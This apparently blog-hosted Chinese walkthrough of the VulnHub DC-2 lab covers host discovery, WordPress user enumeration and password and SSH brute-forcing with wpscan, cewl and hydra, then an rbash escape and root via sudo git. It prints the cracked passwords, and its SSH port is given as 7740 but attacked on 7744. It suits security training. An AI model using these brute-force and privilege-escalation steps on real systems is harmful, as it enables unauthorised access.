实验环境准备:
- kali:172.25.0.69
- DC-2: MAC地址:00:0C:29:FE:17:D2
DC-2靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
0x01 主机发现
netdiscover -i eth0 -r 172.25.0.0/24 //存活主机探测
探测到DC-2靶机的IP地址为 172.25.0.64
image.png
0x02 端口扫描
nmap -A -p- 172.25.0.64 //全端口扫描
探测到80端口开启了HTTP服务,7740端口开启了ssh服务
image.png
浏览器访问web服务,发现无法访问,修改hosts文件如下
hosts文件路径
- windows:C:\Windows\System32\drivers\etc
-
linux:/etc/hosts
image.png
成功访问web服务,发现该网站是使用wordpress cms构建。
image.png
0x03 信息收集
使用wordpress专用扫描器wpscan进行网站扫描
wpscan --url [http://dc-2](http://dc-2) -e vp,u --plugins-detection mixed
枚举得到网站后台用户,并制作用户字典
-e 枚举 u用户名 --plugins-detection vp含有漏洞的插件 mixed 混合模式(主动加被动)
image.png
image.png
nikto -h http://dc-2 //网站敏感页面扫描发现后台登录页面 http://dc-2/wp-login.php
image.png
0x04 密码爆破
cewl 爬行网站来制作一个密码字典
cewl dc-2 > pass.dic
用wpscan来进行表单密码爆破
wpscan --url http://dc-2 -U user.dic -P pass.dic
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
image.png
使用jerry账号登录网站后台管理页面,发现flag1、flag2
image.png
image.png
使用hydra进行ssh爆破,爆破得到ssh账户tom密码为parturient
hydra ssh://dc-2 -L user.dic -P pass.dic -vV -s 7744 -t 50 -o hydra.ssh
image.png
ssh登录发现tom用户登录的shell为rbash(受限制的bash)
rbash绕过参考链接:https://www.freebuf.com/articles/system/188989.html
image.png
查看当前shell可执行的命令
image.png
添加环境变量来绕过bash限制
image.png
在tom用户家目录拿下flag3
image.png
su jerry命令切换到jerry用户,找到flag4
image.png
查看jerry可以以root用户的身份执行git命令并且不需要密码
image.png
0x05 提权
两种方法
1、sudo git help config
在末行命令模式输入 !/bin/bash 或 !'sh' 完成提权
2、sudo git -p help
!/bin/bash
提权成功,拿到该靶机最高权限root
image.png
在root家目录拿下最后一个flag
image.png
网友评论